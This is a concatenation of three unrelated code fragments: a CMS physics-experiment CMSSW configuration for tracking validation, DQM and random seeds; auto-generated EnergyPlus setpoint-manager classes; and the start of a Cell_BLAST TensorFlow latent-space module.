        tip = cms.double(3.5)
    ),
    GpSelectorForEfficiencyVsPt = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(30.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        # Lower pt threshold than the other plots (the plotted variable)
        ptMin = cms.double(0.05),
        status = cms.int32(1),
        tip = cms.double(3.5)
    ),
    GpSelectorForEfficiencyVsVTXR = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(30.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMin = cms.double(0.9),
        status = cms.int32(1),
        tip = cms.double(30.0)
    ),
    GpSelectorForEfficiencyVsVTXZ = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(35.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMin = cms.double(0.9),
        status = cms.int32(1),
        tip = cms.double(3.5)
    ),
    # "Tp" selectors: same structure with extra cuts (hits, phi window,
    # signal/in-time flags)
    TpSelectorForEfficiencyVsEta = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(4.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-4.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.9),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(3.5)
    ),
    TpSelectorForEfficiencyVsPhi = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(2.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.9),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(3.5)
    ),
    TpSelectorForEfficiencyVsPt = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(2.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.05),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(3.5)
    ),
    TpSelectorForEfficiencyVsVTXR = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(2.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.9),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(60.0)
    ),
    TpSelectorForEfficiencyVsVTXZ = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(2.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.9),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(3.5)
    ),
    # Resolution histogram binning (number of bins, axis range)
    cotThetaRes_nbin = cms.int32(300),
    cotThetaRes_rangeMax = cms.double(0.02),
    cotThetaRes_rangeMin = cms.double(-0.02),
    dxyDzZoom = cms.double(25),
    dxyRes_nbin = cms.int32(500),
    dxyRes_rangeMax = cms.double(0.1),
    dxyRes_rangeMin = cms.double(-0.1),
    dzRes_nbin = cms.int32(150),
    dzRes_rangeMax = cms.double(0.05),
    dzRes_rangeMin = cms.double(-0.05),
    # Default selections applied when no plot-specific selector is used
    generalGpSelector = cms.PSet(
        chargedOnly = cms.bool(True),
        lip = cms.double(30.0),
        maxRapidity = cms.double(2.5),
        minRapidity = cms.double(-2.5),
        pdgId = cms.vint32(),
        ptMin = cms.double(0.9),
        status = cms.int32(1),
        tip = cms.double(3.5)
    ),
    generalTpSelector = cms.PSet(
        chargedOnly = cms.bool(True),
        intimeOnly = cms.bool(False),
        lip = cms.double(30.0),
        maxPhi = cms.double(3.2),
        maxRapidity = cms.double(4.5),
        minHit = cms.int32(0),
        minPhi = cms.double(-3.2),
        minRapidity = cms.double(-4.5),
        pdgId = cms.vint32(),
        ptMax = cms.double(1e+100),
        ptMin = cms.double(0.9),
        signalOnly = cms.bool(True),
        stableOnly = cms.bool(False),
        tip = cms.double(3.5)
    ),
    # Histogram axis limits (max*/min*) ...
    maxChi2 = cms.double(20),
    maxDeDx = cms.double(10.0),
    maxDxy = cms.double(25),
    maxDz = cms.double(30),
    maxDzpvCumulative = cms.double(0.6),
    maxDzpvsigCumulative = cms.double(10),
    maxEta = cms.double(4.5),
    maxHit = cms.double(80.5),
    maxLayers = cms.double(25.5),
    maxMVA = cms.double(1),
    maxPVz = cms.double(60),
    maxPhi = cms.double(3.1416),
    maxPt = cms.double(1000),
    maxPu = cms.double(259.5),
    maxTracks = cms.double(2000),
    maxVertcount = cms.double(160.5),
    maxVertpos = cms.double(100),
    maxZpos = cms.double(30),
    maxdr = cms.double(1),
    minChi2 = cms.double(0),
    minDeDx = cms.double(0.0),
    minDxy = cms.double(-25),
    minDz = cms.double(-30),
    minEta = cms.double(-4.5),
    minHit = cms.double(-0.5),
    minLayers = cms.double(-0.5),
    minMVA = cms.double(-1),
    minPVz = cms.double(-60),
    minPhi = cms.double(-3.1416),
    minPt = cms.double(0.1),
    minPu = cms.double(-0.5),
    minTracks = cms.double(0),
    minVertcount = cms.double(-0.5),
    minVertpos = cms.double(0.01),
    minZpos = cms.double(-30),
    mindr = cms.double(0.001),
    # ... and the matching numbers of bins (nint*)
    nintChi2 = cms.int32(40),
    nintDeDx = cms.int32(40),
    nintDxy = cms.int32(100),
    nintDz = cms.int32(60),
    nintDzpvCumulative = cms.int32(240),
    nintDzpvsigCumulative = cms.int32(200),
    nintEta = cms.int32(90),
    nintHit = cms.int32(81),
    nintLayers = cms.int32(26),
    nintMVA = cms.int32(100),
    nintPVz = cms.int32(120),
    nintPhi = cms.int32(36),
    nintPt = cms.int32(40),
    nintPu = cms.int32(130),
    nintTracks = cms.int32(200),
    nintVertcount = cms.int32(161),
    nintVertpos = cms.int32(40),
    nintZpos = cms.int32(60),
    nintdr = cms.int32(100),
    phiRes_nbin = cms.int32(300),
    phiRes_rangeMax = cms.double(0.01),
    phiRes_rangeMin = cms.double(-0.01),
    ptRes_nbin = cms.int32(100),
    ptRes_rangeMax = cms.double(0.1),
    ptRes_rangeMin = cms.double(-0.1),
    seedingLayerSets = cms.vstring(),
    useFabsEta = cms.bool(False),
    useInvPt = cms.bool(False),
    # Logarithmic axes for pt and vertex position
    useLogPt = cms.untracked.bool(True),
    useLogVertpos = cms.untracked.bool(True)
)
# Luminosity information producer, reading from the CMS_LUMI_PROD
# database through the Frontier caching layer
lumiProducer = cms.EDProducer("LumiProducer",
    connect = cms.string('frontier://LumiProd/CMS_LUMI_PROD'),
    lumiversion = cms.untracked.string(''),
    ncacheEntries = cms.untracked.uint32(5)
)
# SiStrip cluster charge thresholds (working points); a value of -1.0
# ("None") disables the cut
SiStripClusterChargeCutLoose = cms.PSet(
    value = cms.double(1620.0)
)
SiStripClusterChargeCutNone = cms.PSet(
    value = cms.double(-1.0)
)
SiStripClusterChargeCutTight = cms.PSet(
    value = cms.double(1945.0)
)
SiStripClusterChargeCutTiny = cms.PSet(
    value = cms.double(800.0)
)
# CSC DQM monitor: consumes the raw data collection; the histogram
# booking layout comes from the XML file below
dqmCSCClient = cms.EDProducer("CSCMonitorModule",
    BOOKING_XML_FILE = cms.FileInPath('DQM/CSCMonitorModule/data/emuDQMBooking.xml'),
    EventProcessor = cms.untracked.PSet(
        BINCHECKER_CRC_ALCT = cms.untracked.bool(True),
        BINCHECKER_CRC_CFEB = cms.untracked.bool(True),
        BINCHECKER_CRC_CLCT = cms.untracked.bool(True),
        BINCHECKER_MODE_DDU = cms.untracked.bool(False),
        BINCHECKER_OUTPUT = cms.untracked.bool(False),
        BINCHECK_MASK = cms.untracked.uint32(384563190),
        DDU_BINCHECK_MASK = cms.untracked.uint32(384563190),
        DDU_CHECK_MASK = cms.untracked.uint32(4294959103),
        EFF_COLD_SIGFAIL = cms.untracked.double(2.0),
        EFF_COLD_THRESHOLD = cms.untracked.double(0.1),
        EFF_ERR_SIGFAIL = cms.untracked.double(5.0),
        EFF_ERR_THRESHOLD = cms.untracked.double(0.1),
        EFF_HOT_SIGFAIL = cms.untracked.double(5.0),
        EFF_HOT_THRESHOLD = cms.untracked.double(2.0),
        EFF_NODATA_SIGFAIL = cms.untracked.double(5.0),
        EFF_NODATA_THRESHOLD = cms.untracked.double(0.99),
        EVENTS_ECHO = cms.untracked.uint32(1000),
        # Output folders in the DQM store
        FOLDER_CSC = cms.untracked.string('CSC/CSC/'),
        FOLDER_DDU = cms.untracked.string('CSC/DDU/'),
        FOLDER_EMU = cms.untracked.string('CSC/Summary/'),
        FOLDER_FED = cms.untracked.string('CSC/FED/'),
        FOLDER_PAR = cms.untracked.string('CSC/EventInfo/reportSummaryContents/'),
        FRAEFF_AUTO_UPDATE = cms.untracked.bool(False),
        FRAEFF_AUTO_UPDATE_FREQ = cms.untracked.uint32(200),
        FRAEFF_AUTO_UPDATE_START = cms.untracked.uint32(5),
        FRAEFF_SEPARATE_THREAD = cms.untracked.bool(False),
        # Monitored-object filter: '+' includes a pattern, '-' excludes
        MO_FILTER = cms.untracked.vstring(
            '+/^.*$/',
            '-/All_Readout_Errors/',
            '-/^DMB_.*$/',
            '-/DDU_[0-9]+/',
            '-/CSC_[0-9]+_[0-9]+/'
        ),
        PROCESS_CSC = cms.untracked.bool(True),
        PROCESS_DDU = cms.untracked.bool(True),
        PROCESS_EFF_HISTOS = cms.untracked.bool(False),
        PROCESS_EFF_PARAMETERS = cms.untracked.bool(False)
    ),
    InputObjects = cms.untracked.InputTag("rawDataCollector"),
    PREBOOK_EFF_PARAMS = cms.untracked.bool(False)
)
###### cms.Services
# Framework-level services, instantiated with default parameters
DBService = cms.Service("DBService")
DQMStore = cms.Service("DQMStore")
# Timing/memory profiling service; publishes its measurements as DQM
# histograms under dqmPath ('DQM/TimerService')
FastTimerService = cms.Service("FastTimerService",
    dqmLumiSectionsRange = cms.untracked.uint32(2500),
    dqmMemoryRange = cms.untracked.double(1000000),
    dqmMemoryResolution = cms.untracked.double(5000),
    dqmModuleMemoryRange = cms.untracked.double(100000),
    dqmModuleMemoryResolution = cms.untracked.double(500),
    dqmModuleTimeRange = cms.untracked.double(100.0),
    dqmModuleTimeResolution = cms.untracked.double(0.5),
    dqmPath = cms.untracked.string('DQM/TimerService'),
    dqmPathMemoryRange = cms.untracked.double(1000000),
    dqmPathMemoryResolution = cms.untracked.double(5000),
    dqmPathTimeRange = cms.untracked.double(10000.0),
    dqmPathTimeResolution = cms.untracked.double(10.0),
    dqmTimeRange = cms.untracked.double(10000.0),
    dqmTimeResolution = cms.untracked.double(10.0),
    # Per-lumisection monitoring is on; per-module/path breakdowns are off
    enableDQM = cms.untracked.bool(True),
    enableDQMTransitions = cms.untracked.bool(False),
    enableDQMbyLumiSection = cms.untracked.bool(True),
    enableDQMbyModule = cms.untracked.bool(False),
    enableDQMbyPath = cms.untracked.bool(False),
    enableDQMbyProcesses = cms.untracked.bool(False),
    highlightModules = cms.untracked.VPSet(),
    printEventSummary = cms.untracked.bool(False),
    printJobSummary = cms.untracked.bool(True),
    printRunSummary = cms.untracked.bool(False)
)
RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
CTPPSFastRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1357987)
),
LHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
MuonSimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(987346)
),
VtxSmeared = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(98765432)
),
ecalPreshowerRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6541321)
),
ecalRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(654321)
),
externalLHEProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(234567)
),
famosPileUp = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
fastSimProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(13579)
),
fastTrackerRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(24680)
),
g4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
generator = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hbhereco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hfreco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hiSignal = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hiSignalG4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
hiSignalLHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(88776655)
),
horeco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
l1ParamMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6453209)
),
mix = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixData = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixGenPU = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixRecoTracks = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixSimCaloHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
paramMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(54525)
),
restoreStateLabel = cms.untracked.string('randomEngineStateProducer'),
saveFileName = cms.untracked.string(''),
simBeamSpotFilter = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
simMuonCSCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11223344)
),
simMuonDTDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonGEMDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0Digis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0PseudoDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0PseudoReDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
| |
`control_zone_air_node_name` or None if not set
"""
return self["Control Zone Air Node Name"]
@control_zone_air_node_name.setter
def control_zone_air_node_name(self, value=None):
"""Corresponds to IDD field `Control Zone Air Node Name`"""
self["Control Zone Air Node Name"] = value
class SetpointManagerMixedAir(DataObject):

    """ Corresponds to IDD object `SetpointManager:MixedAir`
        The Mixed Air Setpoint Manager is meant to be used in conjunction
        with a Controller:OutdoorAir object. This setpoint manager is used
        to establish a temperature setpoint at the mixed air node.
    """
    # IDD-derived metadata consumed by the DataObject base class: field
    # order, required/optional flags, accepted values and types used for
    # validation.  Generated code — the OrderedDict entry order is the IDD
    # field order and must not be changed.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'control variable',
                                       {'name': u'Control Variable',
                                        'pyname': u'control_variable',
                                        'default': u'Temperature',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Temperature'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'reference setpoint node name',
                                       {'name': u'Reference Setpoint Node Name',
                                        'pyname': u'reference_setpoint_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'fan inlet node name',
                                       {'name': u'Fan Inlet Node Name',
                                        'pyname': u'fan_inlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'fan outlet node name',
                                       {'name': u'Fan Outlet Node Name',
                                        'pyname': u'fan_outlet_node_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'}),
                                      (u'setpoint node or nodelist name',
                                       {'name': u'Setpoint Node or NodeList Name',
                                        'pyname': u'setpoint_node_or_nodelist_name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'node'})]),
               'format': None,
               'group': u'Setpoint Managers',
               'min-fields': 0,
               'name': u'SetpointManager:MixedAir',
               'pyname': u'SetpointManagerMixedAir',
               'required-object': False,
               'unique-object': False}

    # All accessors below delegate to DataObject's name-keyed storage:
    # getters return the stored field value (or None), setters store it.
    @property
    def name(self):
        """field `Name`
        Args:
            value (str): value for IDD Field `Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def control_variable(self):
        """field `Control Variable`
        |  Default value: Temperature
        Args:
            value (str): value for IDD Field `Control Variable`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `control_variable` or None if not set
        """
        return self["Control Variable"]

    @control_variable.setter
    def control_variable(self, value="Temperature"):
        """Corresponds to IDD field `Control Variable`"""
        self["Control Variable"] = value

    @property
    def reference_setpoint_node_name(self):
        """field `Reference Setpoint Node Name`
        Args:
            value (str): value for IDD Field `Reference Setpoint Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `reference_setpoint_node_name` or None if not set
        """
        return self["Reference Setpoint Node Name"]

    @reference_setpoint_node_name.setter
    def reference_setpoint_node_name(self, value=None):
        """Corresponds to IDD field `Reference Setpoint Node Name`"""
        self["Reference Setpoint Node Name"] = value

    @property
    def fan_inlet_node_name(self):
        """field `Fan Inlet Node Name`
        Args:
            value (str): value for IDD Field `Fan Inlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `fan_inlet_node_name` or None if not set
        """
        return self["Fan Inlet Node Name"]

    @fan_inlet_node_name.setter
    def fan_inlet_node_name(self, value=None):
        """Corresponds to IDD field `Fan Inlet Node Name`"""
        self["Fan Inlet Node Name"] = value

    @property
    def fan_outlet_node_name(self):
        """field `Fan Outlet Node Name`
        Args:
            value (str): value for IDD Field `Fan Outlet Node Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `fan_outlet_node_name` or None if not set
        """
        return self["Fan Outlet Node Name"]

    @fan_outlet_node_name.setter
    def fan_outlet_node_name(self, value=None):
        """Corresponds to IDD field `Fan Outlet Node Name`"""
        self["Fan Outlet Node Name"] = value

    @property
    def setpoint_node_or_nodelist_name(self):
        """field `Setpoint Node or NodeList Name`
        |  Node(s) at which the temperature will be set
        Args:
            value (str): value for IDD Field `Setpoint Node or NodeList Name`
        Raises:
            ValueError: if `value` is not a valid value
        Returns:
            str: the value of `setpoint_node_or_nodelist_name` or None if not set
        """
        return self["Setpoint Node or NodeList Name"]

    @setpoint_node_or_nodelist_name.setter
    def setpoint_node_or_nodelist_name(self, value=None):
        """Corresponds to IDD field `Setpoint Node or NodeList Name`"""
        self["Setpoint Node or NodeList Name"] = value
class SetpointManagerOutdoorAirPretreat(DataObject):
""" Corresponds to IDD object `SetpointManager:OutdoorAirPretreat`
This setpoint manager determines the required
conditions at the outdoor air stream node which will
produce the reference setpoint condition at the
mixed air node when mixed with the return air stream
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature',
u'HumidityRatio',
u'MaximumHumidityRatio',
u'MinimumHumidityRatio'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum setpoint temperature',
{'name': u'Minimum Setpoint Temperature',
'pyname': u'minimum_setpoint_temperature',
'default': -99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'maximum setpoint temperature',
{'name': u'Maximum Setpoint Temperature',
'pyname': u'maximum_setpoint_temperature',
'default': 99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'minimum setpoint humidity ratio',
{'name': u'Minimum Setpoint Humidity Ratio',
'pyname': u'minimum_setpoint_humidity_ratio',
'default': 1e-05,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'maximum setpoint humidity ratio',
{'name': u'Maximum Setpoint Humidity Ratio',
'pyname': u'maximum_setpoint_humidity_ratio',
'default': 1.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'kgWater/kgDryAir'}),
(u'reference setpoint node name',
{'name': u'Reference Setpoint Node Name',
'pyname': u'reference_setpoint_node_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'mixed air stream node name',
{'name': u'Mixed Air Stream Node Name',
'pyname': u'mixed_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air stream node name',
{'name': u'Outdoor Air Stream Node Name',
'pyname': u'outdoor_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'return air stream node name',
{'name': u'Return Air Stream Node Name',
'pyname': u'return_air_stream_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 11,
'name': u'SetpointManager:OutdoorAirPretreat',
'pyname': u'SetpointManagerOutdoorAirPretreat',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value=None):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def minimum_setpoint_temperature(self):
"""field `Minimum Setpoint Temperature`
| Applicable only if Control variable is Temperature
| Units: C
| Default value: -99.0
Args:
value (float): value for IDD Field `Minimum Setpoint Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_setpoint_temperature` or None if not set
"""
return self["Minimum Setpoint Temperature"]
@minimum_setpoint_temperature.setter
def minimum_setpoint_temperature(self, value=-99.0):
"""Corresponds to IDD field `Minimum Setpoint Temperature`"""
self["Minimum Setpoint Temperature"] = value
@property
def maximum_setpoint_temperature(self):
"""field `Maximum Setpoint Temperature`
| Applicable only if Control variable is Temperature
| Units: C
| Default value: 99.0
Args:
value (float): value for IDD Field `Maximum Setpoint Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_setpoint_temperature` or None if not set
"""
return self["Maximum Setpoint Temperature"]
@maximum_setpoint_temperature.setter
def maximum_setpoint_temperature(self, value=99.0):
"""Corresponds to IDD field `Maximum Setpoint Temperature`"""
self["Maximum Setpoint Temperature"] = value
@property
def minimum_setpoint_humidity_ratio(self):
"""field `Minimum Setpoint Humidity Ratio`
| Applicable only if Control variable is
| MaximumHumidityRatio, MinimumHumidityRatio, or HumidityRatio - then minimum is 0.00001
| Units: kgWater/kgDryAir
| Default value: 1e-05
| value <= 1.0
Args:
value (float): value for IDD Field `Minimum Setpoint Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_setpoint_humidity_ratio` or None if not set
"""
return self["Minimum Setpoint Humidity Ratio"]
@minimum_setpoint_humidity_ratio.setter
def minimum_setpoint_humidity_ratio(self, value=1e-05):
"""Corresponds to IDD field `Minimum Setpoint Humidity Ratio`"""
self["Minimum Setpoint Humidity Ratio"] = value
@property
def maximum_setpoint_humidity_ratio(self):
"""field `Maximum Setpoint Humidity Ratio`
| Applicable only if Control variable is
| MaximumHumidityRatio, MinimumHumidityRatio, or HumidityRatio - then minimum is 0.00001
| Units: kgWater/kgDryAir
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `Maximum Setpoint Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `maximum_setpoint_humidity_ratio` or None if not set
"""
return self["Maximum Setpoint Humidity Ratio"]
@maximum_setpoint_humidity_ratio.setter
def maximum_setpoint_humidity_ratio(self, value=1.0):
"""Corresponds to IDD field | |
# Repository: gao-lab/Cell_BLAST
r"""
Latent space / encoder modules for DIRECTi
"""
import typing
import abc
import numpy as np
import sklearn.metrics
import tensorflow as tf
from . import module, nn, utils
class Latent(module.Module):
    r"""
    Abstract base class for latent-variable (encoder) modules.

    Concrete subclasses implement ``_build_latent`` (the encoder network)
    and ``_build_regularizer`` (the regularization applied to the latent
    space).
    """

    def __init__(
            self, latent_dim: int, h_dim: int = 128, depth: int = 1,
            dropout: float = 0.0, lambda_reg: float = 0.0,
            fine_tune: bool = False, deviation_reg: float = 0.0,
            name: str = "Latent"
    ) -> None:
        super().__init__(name=name)
        self.latent_dim = latent_dim
        self.h_dim = h_dim
        self.depth = depth
        self.dropout = dropout
        self.lambda_reg = lambda_reg
        self.fine_tune = fine_tune
        self.deviation_reg = deviation_reg
        if self.fine_tune and self.deviation_reg > 0:
            # L2-style penalty on deviation (applied to weight deltas by the
            # dense layers) used only when fine-tuning a pretrained model.
            self.deviation_regularizer = \
                lambda x: self.deviation_reg * tf.reduce_mean(tf.square(x))
        else:
            self.deviation_regularizer = None

    @abc.abstractmethod
    def _build_latent(
            self, x: tf.Tensor, training_flag: tf.Tensor,
            scope: str = "encoder"
    ) -> tf.Tensor:  # pragma: no cover
        """Build the encoder network and return the latent tensor."""
        raise NotImplementedError

    @abc.abstractmethod
    def _build_regularizer(
            self, training_flag: tf.Tensor, epoch: tf.Tensor,
            scope: str = "regularizer"
    ) -> tf.Tensor:  # pragma: no cover
        """Build and return the latent-space regularization loss."""
        raise NotImplementedError

    def __bool__(self) -> bool:
        # A constructed latent module always counts as "present".
        return True

    def _get_config(self) -> typing.Mapping:
        """Return a config mapping from which the module can be rebuilt."""
        config = {
            "latent_dim": self.latent_dim,
            "h_dim": self.h_dim,
            "depth": self.depth,
            "dropout": self.dropout,
            "lambda_reg": self.lambda_reg,
            "fine_tune": self.fine_tune,
            "deviation_reg": self.deviation_reg,
        }
        # Base-class entries take precedence, matching the original
        # ``{..., **super()._get_config()}`` merge order.
        config.update(super()._get_config())
        return config
class Gau(Latent):
    r"""
    Build a Gaussian latent module. The Gaussian latent variable is used as
    cell embedding, and is pushed towards a standard normal prior by an
    adversarial (GAN-style) discriminator.

    Parameters
    ----------
    latent_dim
        Dimensionality of the latent variable.
    h_dim
        Dimensionality of the hidden layers in the encoder MLP.
    depth
        Number of hidden layers in the encoder MLP.
    dropout
        Dropout rate.
    lambda_reg
        Regularization strength on the latent variable.
    name
        Name of the module.
    """

    def __init__(
            self, latent_dim: int, h_dim: int = 128, depth: int = 1,
            dropout: float = 0.0, lambda_reg: float = 0.001,
            fine_tune: bool = False, deviation_reg: float = 0.0,
            name: str = "Gau"
    ) -> None:
        super(Gau, self).__init__(latent_dim, h_dim, depth, dropout, lambda_reg,
                                  fine_tune, deviation_reg, name)

    def _build_latent(
